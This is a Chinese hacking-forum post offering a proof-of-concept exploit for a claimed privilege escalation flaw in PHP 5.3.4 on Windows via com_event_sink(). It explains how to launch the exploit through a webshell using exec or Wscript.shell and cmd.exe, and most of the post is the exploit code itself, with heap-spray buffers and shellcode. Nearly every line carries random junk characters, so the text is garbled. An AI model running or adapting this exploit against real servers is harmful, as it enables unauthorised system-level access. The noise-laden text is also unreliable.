|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中: W& \. @+ F6 j: \
# H! ?, Z' U) U( i
测试方法如下:cmd /c x:\php\php.exe x:\test.php4 P. q9 p1 x$ s0 P" \
- L: ~ U4 d h3 ^$ }下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php; P% L' E* l& f7 P8 ^) @2 E1 S4 d
这里是两个测试的截图:) E$ P- v; S4 M! E) P# Z2 K6 B
$ O8 s9 k( ^4 r: ?: |/ X" Q
3 C" t% P& K4 H$ t) B( G2 P; h% U' y5 e' \
, [6 M( _$ n: L0 d# q! C5 V2 ]
! {2 D( w. f3 i7 E' m1 e
成功利用此漏洞的攻击者将获得系统的最高权限! T6 e0 t' a/ m7 f' H! F
3 _1 A+ f5 n0 Z2 o8 ^, d& R: f7 I2 k6 w
# S9 @1 W4 l# h
+ G8 g2 {' k& g' J( k
8 x) _2 j3 s ?" `% ?关于漏洞分析稍后附上。一下是PoC代码:9 T+ W% H; r, V
4 g' ^ A6 ?9 m7 R! a3 c. S1 a& l
<?php
! ?. Z+ X8 _( t# t2 b//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞% E7 W: b; b4 m2 }6 b" `8 I2 d
//$eip ="\x44\x43\x42\x41";# A0 x2 e2 Z$ ^3 s6 k
$eip= "\x4b\xe8\x57\x78";
: l% J% T2 C8 G Q$eax ="\x80\x01\x8d\x04";' N0 {3 W( ~! W0 B9 \* p/ j, r
$deodrant="";
3 D/ u! C* h5 n! n, f0 W! F$axespray = str_repeat($eip.$eax,0x80);- g( I' F9 T! W0 Y( Z
//048d0190
) s. W* D. ?, l: T/ Vecho strlen($axespray);# T7 J( B3 v0 {
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
( e# v3 I7 _! B6 C2 `echo "Silic Group Hacker Army - BlackBap.Org";
+ o9 e( [% S+ Y" R, s. q//19200 ==4B32 4b001 G5 r6 c3 \! a) L% m; j* `
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}, y# O5 v- a" x' d2 _
$terminate = "T";8 {: v9 F) \. v0 H
$u[] =$deodrant;2 ?* Y! s# y, P$ P) X u2 @* `
$r[] =$deodrant.$terminate;
) z+ D6 |. ?$ o$a[] =$deodrant.$terminate;; `$ Y* }8 a2 }! t8 S0 o1 A
$s[] =$deodrant.$terminate;1 c$ i+ t/ S6 i
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
1 R& H/ V/ b5 Y- Z2 ]$vVar = new VARIANT(0x048d0000+180);
) m ^- J! l$ ~, g4 H# }3 n//弹窗代码(Shellcode)
9 h/ n1 F6 t" F [$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";$ g# [! \/ o. k1 s5 C$ ~
$var2 = new VARIANT(0x41414242);% i3 s7 D; p1 Z+ Z% G
com_event_sink($vVar,$var2,$buffer);$ u" D1 g8 n/ I; H. `# G
?>
9 d2 e& f/ d4 H* G! h |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|